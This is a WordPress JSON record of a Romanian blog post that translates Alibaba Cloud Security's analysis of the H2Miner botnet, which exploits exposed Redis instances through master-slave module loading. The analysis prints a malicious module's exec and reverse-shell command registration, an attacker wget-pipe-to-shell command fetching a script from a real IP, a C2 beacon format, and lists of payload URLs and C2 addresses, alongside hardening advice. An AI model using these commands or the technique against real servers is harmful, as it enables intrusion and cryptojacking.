{"id":55714,"date":"2020-01-27T00:00:00","date_gmt":"2020-01-26T21:00:00","guid":{"rendered":"https:\/\/prohoster.info\/blog\/blog_prohoster\/obnaruzhena-novaya-vspyshka-h2miner-chervej-kotorye-ekspluatiruyut-redis-rce"},"modified":"2020-02-18T14:03:51","modified_gmt":"2020-02-18T11:03:51","slug":"obnaruzhena-novaya-vspyshka-h2miner-chervej-kotorye-ekspluatiruyut-redis-rce","status":"publish","type":"post","link":"https:\/\/prohoster.info\/ro\/blog\/administrirovanie\/obnaruzhena-novaya-vspyshka-h2miner-chervej-kotorye-ekspluatiruyut-redis-rce","title":{"rendered":"A fost descoperit\u0103 o nou\u0103 furtun\u0103 de viermi H2Miner, care exploateaz\u0103 RCE Redis","gt_translate_keys":[{"key":"rendered","format":"text"}]},"content":{"rendered":"<blockquote><p>Acum o zi, unul dintre serverele proiectului meu a fost atacat de un astfel de vierme. C\u0103ut\u00e2nd un r\u0103spuns la \u00eentrebarea \u201ece a fost asta?\u201d, am g\u0103sit un articol minunat scris de echipa Alibaba Cloud Security. Deoarece nu am g\u0103sit acest articol pe Habr\u0103, am decis s\u0103 \u00eel traduc special pentru voi &lt;3\n<\/p><\/blockquote>\n<h2>Introducere<\/h2>\n<p>\nRecent, echipa de securitate Alibaba Cloud a descoperit o izbucnire brusc\u0103 a H2Miner. Acest tip de vierme malware folose\u0219te lipsa autoriz\u0103rii sau parolele slabe pentru Redis ca por\u021bi de acces la sistemele dumneavoastr\u0103, sincroniz\u00e2ndu-se apoi cu propriul s\u0103u modul malware pe slave prin sincronizarea master-slave \u0219i, \u00een final, \u00eenc\u0103rc\u00e2nd acest modul malware pe ma\u0219ina atacat\u0103 \u0219i execut\u00e2nd instruc\u021biunile mali\u021bioase.<\/p>\n<p>\u00cen trecut, atacurile asupra sistemelor dumneavoastr\u0103 erau realizate \u00een principal prin metode care implicau sarcini programate sau chei SSH care erau scrise pe ma\u0219ina dumneavoastr\u0103 dup\u0103 ce infractorul p\u0103trundea \u00een Redis. Din fericire, aceast\u0103 metod\u0103 nu mai poate fi folosit\u0103 frecvent din cauza problemelor de control al permisiunilor sau a versiunilor diferite ale sistemului. Totu\u0219i, aceast\u0103 metod\u0103 de \u00eenc\u0103rcare a modulului malware poate executa direct comenzile atacatorului sau ob\u021bine acces la shell, ceea ce este periculos pentru sistemul dumneavoastr\u0103.<\/p>\n<p>Din cauza num\u0103rului mare de <a class=\"wpil_keyword_link\" href=\"https:\/\/prohoster.info\/ro\/server\/\"   title=\"servere\" data-wpil-keyword-link=\"linked\"  data-wpil-monitor-id=\"1464\">servere<\/a> Redis disponibile pe internet (aproape 1 milion), echipa de securitate Alibaba Cloud, ca un memento prietenesc, recomand\u0103 utilizatorilor s\u0103 nu permit\u0103 accesul la Redis din re\u021bea \u0219i s\u0103 verifice regulat soliditatea parolelor lor, precum \u0219i s\u0103 se asigure c\u0103 nu sunt vulnerabile la atacuri prin for\u021b\u0103 brut\u0103.<\/p>\n<h2>H2Miner<\/h2>\n<p>\nH2Miner este un botnet de minerit pentru sisteme bazate pe Linux, care poate p\u0103trunde \u00een sistemul dumneavoastr\u0103 prin diferite metode, inclusiv lipsa autoriz\u0103rii \u00een Hadoop yarn, Docker \u0219i vulnerabilitatea de execu\u021bie la distan\u021b\u0103 a comenzilor Redis (RCE). Botnetul func\u021bioneaz\u0103 prin \u00eenc\u0103rcarea scripturilor mali\u021bioase \u0219i a programelor malware pentru a mina datele dumneavoastr\u0103, extinderea orizontal\u0103 a atacului \u0219i men\u021binerea leg\u0103turii de comand\u0103 \u0219i control (C&amp;C).<br \/>\n<noindex><a rel=\"nofollow\" name=\"habracut\"><\/a><\/noindex><\/p>\n<h2>Redis RCE<\/h2>\n<p>\nCuno\u0219tin\u021bele despre aceast\u0103 problem\u0103 au fost \u00eemp\u0103rt\u0103\u0219ite de Pavel Toporkov la ZeroNights 2018. Dup\u0103 versiunea 4.0, Redis suport\u0103 func\u021bia de \u00eenc\u0103rcare a modulelor externe, care ofer\u0103 utilizatorilor posibilitatea de a \u00eenc\u0103rca fi\u0219iere so, compilate cu C \u00een Redis pentru a executa anumite comenzi Redis. Aceast\u0103 func\u021bie, de\u0219i util\u0103, con\u021bine o vulnerabilitate prin care, \u00een modul master-slave, fi\u0219ierele pot fi sincronizate cu slave prin modul fullresync. Aceasta poate fi utilizat\u0103 de un atacator pentru a transmite fi\u0219iere so mali\u021bioase. Dup\u0103 finalizarea transferului, atacatorii \u00eencarc\u0103 modulul pe instan\u021ba Redis atacat\u0103 \u0219i execut\u0103 orice comand\u0103.<\/p>\n<h2>Analiza viermilor mali\u021bio\u0219i<\/h2>\n<p>\nRecent, echipa de securitate Alibaba Cloud a descoperit c\u0103 dimensiunea grupului de mineri mali\u021bio\u0219i H2Miner a crescut brusc. Potrivit analizei, procesul general de apari\u021bie a atacului arat\u0103 astfel:<\/p>\n<p><img decoding=\"async\" alt=\"A fost descoperit\u0103 o nou\u0103 furtun\u0103 de viermi H2Miner, care exploateaz\u0103 RCE Redis\" src=\"\/wp-content\/uploads\/2020\/01\/e4e47a0ddb0bd9f8d97dd992f3349016.jpg\" style=\"display:block;margin: 0 auto;\" \/><br \/>\n<br \/>\nH2Miner folose\u0219te RCE Redis pentru un atac complet. Mai \u00eent\u00e2i, atacatorii atac\u0103 servere Redis neprotejate sau servere cu parole slabe.<\/p>\n<p>Apoi, ei folosesc comanda <code>config set dbfilename red2.so<\/code> pentru a schimba numele fi\u0219ierului. Dup\u0103 aceasta, atacatorii execut\u0103 comanda <code>slaveof<\/code> pentru a stabili adresa gazdelor de replicare master-slave. <\/p>\n<p>C\u00e2nd instan\u021ba Redis atacat\u0103 stabile\u0219te o conexiune master-slave cu Redis mali\u021bios, care apar\u021bine atacatorului, atacatorul trimite modulul infectat prin comanda fullresync pentru a sincroniza fi\u0219ierele. Apoi, fi\u0219ierul red2.so va fi \u00eenc\u0103rcat pe ma\u0219ina atacat\u0103. Dup\u0103 aceea, atacatorii folosesc modulul .\/red2.so pentru a \u00eenc\u0103rca acest fi\u0219ier so. Modulul poate executa comenzile atacatorului sau ini\u021bia o conexiune invers\u0103 (backdoor) pentru a ob\u021bine acces la ma\u0219ina atacat\u0103.<\/p>\n<pre><code class=\"plaintext\">if (RedisModule_CreateCommand(ctx, \"system.exec\",\n        DoCommand, \"readonly\", 1, 1, 1) == REDISMODULE_ERR)\n        return REDISMODULE_ERR;\n      if (RedisModule_CreateCommand(ctx, \"system.rev\",\n        RevShellCommand, \"readonly\", 1, 1, 1) == REDISMODULE_ERR)\n        return REDISMODULE_ERR;\n<\/code><\/pre>\n<p>\nDup\u0103 ce execut\u0103 o comand\u0103 mali\u021bioas\u0103, cum ar fi <code>\/ bin \/ sh -c wget -q -O-http:\/\/195.3.146.118\/unk.sh | sh&gt; \/ dev \/ null 2&gt; &amp; 1<\/code>, atacatorul va reseta numele fi\u0219ierului de rezerv\u0103 \u0219i va desc\u0103rca modulul de sistem pentru a \u0219terge urmele. Cu toate acestea, fi\u0219ierul red2.so va r\u0103m\u00e2ne \u00een continuare pe ma\u0219ina atacat\u0103. Utilizatorii sunt recomanda\u021bi s\u0103 acorde aten\u021bie existen\u021bei unui astfel de fi\u0219ier suspect \u00een folderul instan\u021bei lor Redis.<\/p>\n<p>\u00cen plus fa\u021b\u0103 de distrugerea unor procese malware pentru furtul de resurse, atacatorul a urmat un scenariu mali\u021bios, desc\u0103rc\u00e2nd \u0219i execut\u00e2nd fi\u0219iere mali\u021bioase \u00een format binar pentru a <noindex><a rel=\"nofollow\" href=\"http:\/\/142.44.191.122\/kinsing\">142.44.191.122\/kinsing<\/a><\/noindex>. Acest lucru \u00eenseamn\u0103 c\u0103 numele procesului sau numele directorului care con\u021bine kinsing pe gazd\u0103 poate indica faptul c\u0103 aceast\u0103 ma\u0219in\u0103 a fost infectat\u0103 cu acest virus.<\/p>\n<p>Conform rezultatelor reverse engineering, malware-ul \u00eendepline\u0219te \u00een principal urm\u0103toarele func\u021bii:<\/p>\n<ul>\n<li>Desc\u0103rcarea \u0219i executarea fi\u0219ierelor<\/li>\n<li>Minare<\/li>\n<li>Men\u021binerea comunic\u0103rii C&amp;C \u0219i executarea comenzilor atacatorului<\/li>\n<\/ul>\n<p>\n<img decoding=\"async\" alt=\"A fost descoperit\u0103 o nou\u0103 furtun\u0103 de viermi H2Miner, care exploateaz\u0103 RCE Redis\" src=\"\/wp-content\/uploads\/2020\/01\/43229670fd28e4b7f1974aa3c36dc3ca.jpg\" style=\"display:block;margin: 0 auto;\" \/><br \/>\n<br \/>\nUtiliz\u00e2nd masscan pentru scanarea extern\u0103, pentru a extinde impactul. De asemenea, adresa IP a serverului C&amp;C este criptat\u0103 \u00een program, iar gazda atacat\u0103 va interac\u021biona cu serverul de comunicare C&amp;C prin cereri HTTP, unde informa\u021biile despre zombie (serverul hack-uit) sunt identificate \u00een antetul HTTP.<\/p>\n<p><img decoding=\"async\" alt=\"A fost descoperit\u0103 o nou\u0103 furtun\u0103 de viermi H2Miner, care exploateaz\u0103 RCE Redis\" src=\"\/wp-content\/uploads\/2020\/01\/111ba916fa76f45fe458622f260b1d8e.jpg\" style=\"display:block;margin: 0 auto;\" \/><br \/>\n<\/p>\n<pre><code class=\"plaintext\">GET \/h HTTP\/1.1\nHost: 91.215.169.111\nUser-Agent: Mozilla\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\/537.36 (KHTML, like Gecko) Chrome\/78.0.3904.108 Safari\/537.36\nArch: amd64\nCores: 2\nMem: 3944\nOs: linux\nOsname: debian\nOsversion: 10.0\nRoot: false\nS: k\nUuid: xxxxxxxx-xxxx-xxxx-xxxx-xxxxxxxx\nVersion: 26\nAccept-Encoding: gzip\n<\/code><\/pre>\n<p><\/p>\n<h2>Celelalte metode de atac<\/h2>\n<p>\n<img decoding=\"async\" alt=\"A fost descoperit\u0103 o nou\u0103 furtun\u0103 de viermi H2Miner, care exploateaz\u0103 RCE Redis\" src=\"\/wp-content\/uploads\/2020\/01\/51c088251ac8fd71d229bfe96e239c29.jpg\" style=\"display:block;margin: 0 auto;\" \/><br \/>\n<\/p>\n<h2>Adresele \u0219i linkurile folosite de vierme<\/h2>\n<p>\n\/kinsing<\/p>\n<pre><code class=\"plaintext\">\u2022 142.44.191.122\/t.sh\n\u2022 185.92.74.42\/h.sh\n\u2022 142.44.191.122\/spr.sh\n\u2022 142.44.191.122\/spre.sh\n\u2022 195.3.146.118\/unk.sh\n<\/code><\/pre>\n<p>\nc&amp;c<\/p>\n<pre><code class=\"plaintext\">\u2022 45.10.88.102\n\u2022 91.215.169.111\n\u2022 139.99.50.255\n\u2022 46.243.253.167\n\u2022 195.123.220.193\n<\/code><\/pre>\n<p><\/p>\n<h2>Sfaturi<\/h2>\n<p>\n\u00cen primul r\u00e2nd, Redis nu trebuie s\u0103 fie accesibil din Internet \u0219i trebuie s\u0103 fie protejat cu o parol\u0103 puternic\u0103. De asemenea, este important ca clien\u021bii s\u0103 verifice absen\u021ba fi\u0219ierului red2.so \u00een directorul Redis \u0219i absen\u021ba \u201ekinsing\u201d \u00een numele fi\u0219ierului\/procesului pe gazd\u0103.<br \/>\n<br \/>Sursa: <a content=\"nofollow\" rel=\"nofollow\" href=\"https:\/\/habr.com\/ru\/post\/485300\/\">habr.com<\/a><\/p>","protected":false,"gt_translate_keys":[{"key":"rendered","format":"html"}]},"excerpt":{"rendered":"<p>\u0414\u0435\u043d\u044c \u043d\u0430\u0437\u0430\u0434 \u043e\u0434\u0438\u043d \u0438\u0437 \u0441\u0435\u0440\u0432\u0435\u0440\u043e\u0432 \u043c\u043e\u0435\u0433\u043e \u043f\u0440\u043e\u0435\u043a\u0442\u0430 \u0431\u044b\u043b \u0430\u0442\u0430\u043a\u043e\u0432\u0430\u043d \u043f\u043e\u0434\u043e\u0431\u043d\u044b\u043c \u0447\u0435\u0440\u0432\u0435\u043c. \u0412 \u043f\u043e\u0438\u0441\u043a\u0430\u0445 \u043e\u0442\u0432\u0435\u0442\u0430 \u043d\u0430 \u0432\u043e\u043f\u0440\u043e\u0441 \u00ab\u0447\u0442\u043e \u0436\u0435 \u044d\u0442\u043e \u0431\u044b\u043b\u043e \u0442\u0430\u043a\u043e\u0435?\u00bb \u044f \u043d\u0430\u0448\u0435\u043b \u0437\u0430\u043c\u0435\u0447\u0430\u0442\u0435\u043b\u044c\u043d\u0443\u044e \u0441\u0442\u0430\u0442\u044c\u044e \u043a\u043e\u043c\u0430\u043d\u0434\u044b Alibaba Cloud Security. \u041f\u043e\u0441\u043a\u043e\u043b\u044c\u043a\u0443 \u044f \u043d\u0435 \u043d\u0430\u0448\u0435\u043b \u044d\u0442\u043e\u0442 \u0441\u0442\u0430\u0442\u044c\u0438 \u043d\u0430 \u0445\u0430\u0431\u0440\u0435, \u0442\u043e \u0440\u0435\u0448\u0438\u043b \u043f\u0435\u0440\u0435\u0432\u0435\u0441\u0442\u0438 \u0435\u0435 \u0441\u043f\u0435\u0446\u0438\u0430\u043b\u044c\u043d\u043e \u0434\u043b\u044f \u0432\u0430\u0441 &lt;3 \u0412\u0441\u0442\u0443\u043f\u043b\u0435\u043d\u0438\u0435 \u041d\u0435\u0434\u0430\u0432\u043d\u043e \u043a\u043e\u043c\u0430\u043d\u0434\u0430 \u0431\u0435\u0437\u043e\u043f\u0430\u0441\u043d\u043e\u0441\u0442\u0438 Alibaba Cloud \u043e\u0431\u043d\u0430\u0440\u0443\u0436\u0438\u043b\u0430 \u0432\u043d\u0435\u0437\u0430\u043f\u043d\u0443\u044e \u0432\u0441\u043f\u044b\u0448\u043a\u0443 H2Miner. [&hellip;]<\/p>\n","protected":false,"gt_translate_keys":[{"key":"rendered","format":"html"}]},"author":1,"featured_media":0,"comment_status":"open","ping_status":"open","sticky":false,"template":"","format":"standard","meta":{"footnotes":""},"categories":[688],"tags":[],"class_list":["post-55714","post","type-post","status-publish","format-standard","hentry","category-administrirovanie"],"aioseo_notices":[],"aioseo_head":"\n\t\t<!-- All in One SEO 5.0.2.1 - aioseo.com -->\n\t<meta name=\"description\" content=\"\u0414\u0435\u043d\u044c \u043d\u0430\u0437\u0430\u0434 \u043e\u0434\u0438\u043d \u0438\u0437 \u0441\u0435\u0440\u0432\u0435\u0440\u043e\u0432 \u043c\u043e\u0435\u0433\u043e \u043f\u0440\u043e\u0435\u043a\u0442\u0430 \u0431\u044b\u043b \u0430\u0442\u0430\u043a\u043e\u0432\u0430\u043d \u043f\u043e\u0434\u043e\u0431\u043d\u044b\u043c \u0447\u0435\u0440\u0432\u0435\u043c. \u0412 \u043f\u043e\u0438\u0441\u043a\u0430\u0445 \u043e\u0442\u0432\u0435\u0442\u0430 \u043d\u0430 \u0432\u043e\u043f\u0440\u043e\u0441 \u00ab\u0447\u0442\u043e \u0436\u0435 \u044d\u0442\u043e \u0431\u044b\u043b\u043e \u0442\u0430\u043a\u043e\u0435?\u00bb \u044f \u043d\u0430\u0448\u0435\u043b \u0437\u0430\u043c\u0435\u0447\u0430\u0442\u0435\u043b\u044c\u043d\u0443\u044e \u0441\u0442\u0430\u0442\u044c\u044e \u043a\u043e\u043c\u0430\u043d\u0434\u044b Alibaba Cloud Security.\" \/>\n\t<meta name=\"robots\" content=\"max-image-preview:large\" \/>\n\t<meta name=\"author\" content=\"Yuri Gagarin\"\/>\n\t<link rel=\"canonical\" href=\"https:\/\/prohoster.info\/ro\/blog\/administrirovanie\/obnaruzhena-novaya-vspyshka-h2miner-chervej-kotorye-ekspluatiruyut-redis-rce\" \/>\n\t<meta name=\"generator\" content=\"All in One SEO (AIOSEO) 5.0.2.1\" \/>\n\t\t<meta property=\"og:locale\" content=\"ro_RO\" \/>\n\t\t<meta property=\"og:site_name\" content=\"ProHoster | \u041a\u0443\u043f\u0438\u0442\u044c \u043d\u0430\u0434\u0435\u0436\u043d\u044b\u0439 \u0445\u043e\u0441\u0442\u0438\u043d\u0433 \u0434\u043b\u044f \u0441\u0430\u0439\u0442\u043e\u0432 \u0441 \u0437\u0430\u0449\u0438\u0442\u043e\u0439 \u043e\u0442 DDoS, VPS VDS \u0441\u0435\u0440\u0432\u0435\u0440\u044b\" \/>\n\t\t<meta property=\"og:type\" content=\"article\" \/>\n\t\t<meta property=\"og:title\" content=\"\ud83e\udd47\u041e\u0431\u043d\u0430\u0440\u0443\u0436\u0435\u043d\u0430 \u043d\u043e\u0432\u0430\u044f \u0432\u0441\u043f\u044b\u0448\u043a\u0430 H2Miner \u0447\u0435\u0440\u0432\u0435\u0439, \u043a\u043e\u0442\u043e\u0440\u044b\u0435 \u044d\u043a\u0441\u043f\u043b\u0443\u0430\u0442\u0438\u0440\u0443\u044e\u0442 Redis RCE | ProHoster\" \/>\n\t\t<meta property=\"og:description\" content=\"\u0414\u0435\u043d\u044c \u043d\u0430\u0437\u0430\u0434 \u043e\u0434\u0438\u043d \u0438\u0437 \u0441\u0435\u0440\u0432\u0435\u0440\u043e\u0432 \u043c\u043e\u0435\u0433\u043e \u043f\u0440\u043e\u0435\u043a\u0442\u0430 \u0431\u044b\u043b \u0430\u0442\u0430\u043a\u043e\u0432\u0430\u043d \u043f\u043e\u0434\u043e\u0431\u043d\u044b\u043c \u0447\u0435\u0440\u0432\u0435\u043c. \u0412 \u043f\u043e\u0438\u0441\u043a\u0430\u0445 \u043e\u0442\u0432\u0435\u0442\u0430 \u043d\u0430 \u0432\u043e\u043f\u0440\u043e\u0441 \u00ab\u0447\u0442\u043e \u0436\u0435 \u044d\u0442\u043e \u0431\u044b\u043b\u043e \u0442\u0430\u043a\u043e\u0435?\u00bb \u044f \u043d\u0430\u0448\u0435\u043b \u0437\u0430\u043c\u0435\u0447\u0430\u0442\u0435\u043b\u044c\u043d\u0443\u044e \u0441\u0442\u0430\u0442\u044c\u044e \u043a\u043e\u043c\u0430\u043d\u0434\u044b Alibaba Cloud Security.\" \/>\n\t\t<meta property=\"og:url\" content=\"https:\/\/prohoster.info\/ro\/blog\/administrirovanie\/obnaruzhena-novaya-vspyshka-h2miner-chervej-kotorye-ekspluatiruyut-redis-rce\" \/>\n\t\t<meta property=\"og:image\" content=\"https:\/\/prohoster.info\/wp-content\/uploads\/2021\/11\/logo-350.jpg\" \/>\n\t\t<meta property=\"og:image:secure_url\" content=\"https:\/\/prohoster.info\/wp-content\/uploads\/2021\/11\/logo-350.jpg\" \/>\n\t\t<meta property=\"og:image:width\" content=\"350\" \/>\n\t\t<meta property=\"og:image:height\" content=\"350\" \/>\n\t\t<meta property=\"article:published_time\" content=\"2020-01-26T21:00:00+00:00\" \/>\n\t\t<meta property=\"article:modified_time\" content=\"2020-02-18T11:03:51+00:00\" \/>\n\t\t<meta property=\"article:publisher\" content=\"https:\/\/www.facebook.com\/prohoster\" \/>\n\t\t<meta property=\"article:author\" content=\"https:\/\/www.facebook.com\/prohoster\" \/>\n\t\t<!-- All in One SEO -->\n\n","aioseo_head_json":{"title":"\ud83e\udd47A fost descoperit\u0103 o nou\u0103 epidemie de viermi H2Miner, care exploateaz\u0103 RCE Redis | ProHoster","description":"Cu o zi \u00een urm\u0103, unul dintre serverele proiectului meu a fost atacat de un vierme similar. \u00cen c\u0103utarea r\u0103spunsului la \u00eentrebarea \u201ece a fost asta?\u201d am g\u0103sit un articol remarcabil de la echipa Alibaba Cloud Security.","canonical_url":"https:\/\/prohoster.info\/ro\/blog\/administrirovanie\/obnaruzhena-novaya-vspyshka-h2miner-chervej-kotorye-ekspluatiruyut-redis-rce","robots":"max-image-preview:large","keywords":"","webmasterTools":{"miscellaneous":""},"schema":null,"og:locale":"ro_RO","og:site_name":"ProHoster | \u041a\u0443\u043f\u0438\u0442\u044c \u043d\u0430\u0434\u0435\u0436\u043d\u044b\u0439 \u0445\u043e\u0441\u0442\u0438\u043d\u0433 \u0434\u043b\u044f \u0441\u0430\u0439\u0442\u043e\u0432 \u0441 \u0437\u0430\u0449\u0438\u0442\u043e\u0439 \u043e\u0442 DDoS, VPS VDS \u0441\u0435\u0440\u0432\u0435\u0440\u044b","og:type":"article","og:title":"\ud83e\udd47\u041e\u0431\u043d\u0430\u0440\u0443\u0436\u0435\u043d\u0430 \u043d\u043e\u0432\u0430\u044f \u0432\u0441\u043f\u044b\u0448\u043a\u0430 H2Miner \u0447\u0435\u0440\u0432\u0435\u0439, \u043a\u043e\u0442\u043e\u0440\u044b\u0435 \u044d\u043a\u0441\u043f\u043b\u0443\u0430\u0442\u0438\u0440\u0443\u044e\u0442 Redis RCE | ProHoster","og:description":"\u0414\u0435\u043d\u044c \u043d\u0430\u0437\u0430\u0434 \u043e\u0434\u0438\u043d \u0438\u0437 \u0441\u0435\u0440\u0432\u0435\u0440\u043e\u0432 \u043c\u043e\u0435\u0433\u043e \u043f\u0440\u043e\u0435\u043a\u0442\u0430 \u0431\u044b\u043b \u0430\u0442\u0430\u043a\u043e\u0432\u0430\u043d \u043f\u043e\u0434\u043e\u0431\u043d\u044b\u043c \u0447\u0435\u0440\u0432\u0435\u043c. \u0412 \u043f\u043e\u0438\u0441\u043a\u0430\u0445 \u043e\u0442\u0432\u0435\u0442\u0430 \u043d\u0430 \u0432\u043e\u043f\u0440\u043e\u0441 \u00ab\u0447\u0442\u043e \u0436\u0435 \u044d\u0442\u043e \u0431\u044b\u043b\u043e \u0442\u0430\u043a\u043e\u0435?\u00bb \u044f \u043d\u0430\u0448\u0435\u043b \u0437\u0430\u043c\u0435\u0447\u0430\u0442\u0435\u043b\u044c\u043d\u0443\u044e \u0441\u0442\u0430\u0442\u044c\u044e \u043a\u043e\u043c\u0430\u043d\u0434\u044b Alibaba Cloud Security.","og:url":"https:\/\/prohoster.info\/ro\/blog\/administrirovanie\/obnaruzhena-novaya-vspyshka-h2miner-chervej-kotorye-ekspluatiruyut-redis-rce","og:image":"https:\/\/prohoster.info\/wp-content\/uploads\/2021\/11\/logo-350.jpg","og:image:secure_url":"https:\/\/prohoster.info\/wp-content\/uploads\/2021\/11\/logo-350.jpg","og:image:width":350,"og:image:height":350,"article:published_time":"2020-01-26T21:00:00+00:00","article:modified_time":"2020-02-18T11:03:51+00:00","article:publisher":"https:\/\/www.facebook.com\/prohoster","article:author":"https:\/\/www.facebook.com\/prohoster"},"aioseo_meta_data":{"post_id":"55714","title":null,"description":null,"keywords":null,"keyphrases":null,"primary_term":null,"canonical_url":null,"og_title":null,"og_description":null,"og_object_type":"default","og_image_type":"default","og_image_url":null,"og_image_width":null,"og_image_height":null,"og_image_custom_url":null,"og_image_custom_fields":null,"og_video":null,"og_custom_url":null,"og_article_section":null,"og_article_tags":null,"twitter_use_og":false,"twitter_card":"default","twitter_image_type":"default","twitter_image_url":null,"twitter_image_custom_url":null,"twitter_image_custom_fields":null,"twitter_title":null,"twitter_description":null,"schema":{"blockGraphs":[],"customGraphs":[],"default":{"data":{"Article":[],"Course":[],"Dataset":[],"FAQPage":[],"Movie":[],"Person":[],"Product":[],"ProductReview":[],"Car":[],"Recipe":[],"Service":[],"SoftwareApplication":[],"WebPage":[]},"graphName":"","isEnabled":true},"graphs":[]},"schema_type":null,"schema_type_options":null,"pillar_content":false,"robots_default":true,"robots_noindex":false,"robots_noarchive":false,"robots_nosnippet":false,"robots_nofollow":false,"robots_noimageindex":false,"robots_noodp":false,"robots_notranslate":false,"robots_max_snippet":null,"robots_max_videopreview":null,"robots_max_imagepreview":"large","priority":null,"frequency":null,"local_seo":null,"seo_analyzer_scan_date":null,"breadcrumb_settings":null,"limit_modified_date":false,"reviewed_by":null,"ai":null,"created":"2021-02-28 19:38:31","updated":"2026-02-09 16:50:17","focus_keyword":null,"additional_keywords":null,"truseo_locale":null},"gt_translate_keys":[{"key":"link","format":"url"}],"_links":{"self":[{"href":"https:\/\/prohoster.info\/ro\/wp-json\/wp\/v2\/posts\/55714","targetHints":{"allow":["GET"]}}],"collection":[{"href":"https:\/\/prohoster.info\/ro\/wp-json\/wp\/v2\/posts"}],"about":[{"href":"https:\/\/prohoster.info\/ro\/wp-json\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"https:\/\/prohoster.info\/ro\/wp-json\/wp\/v2\/users\/1"}],"replies":[{"embeddable":true,"href":"https:\/\/prohoster.info\/ro\/wp-json\/wp\/v2\/comments?post=55714"}],"version-history":[{"count":1,"href":"https:\/\/prohoster.info\/ro\/wp-json\/wp\/v2\/posts\/55714\/revisions"}],"predecessor-version":[{"id":158708,"href":"https:\/\/prohoster.info\/ro\/wp-json\/wp\/v2\/posts\/55714\/revisions\/158708"}],"wp:attachment":[{"href":"https:\/\/prohoster.info\/ro\/wp-json\/wp\/v2\/media?parent=55714"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"https:\/\/prohoster.info\/ro\/wp-json\/wp\/v2\/categories?post=55714"},{"taxonomy":"post_tag","embeddable":true,"href":"https:\/\/prohoster.info\/ro\/wp-json\/wp\/v2\/tags?post=55714"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}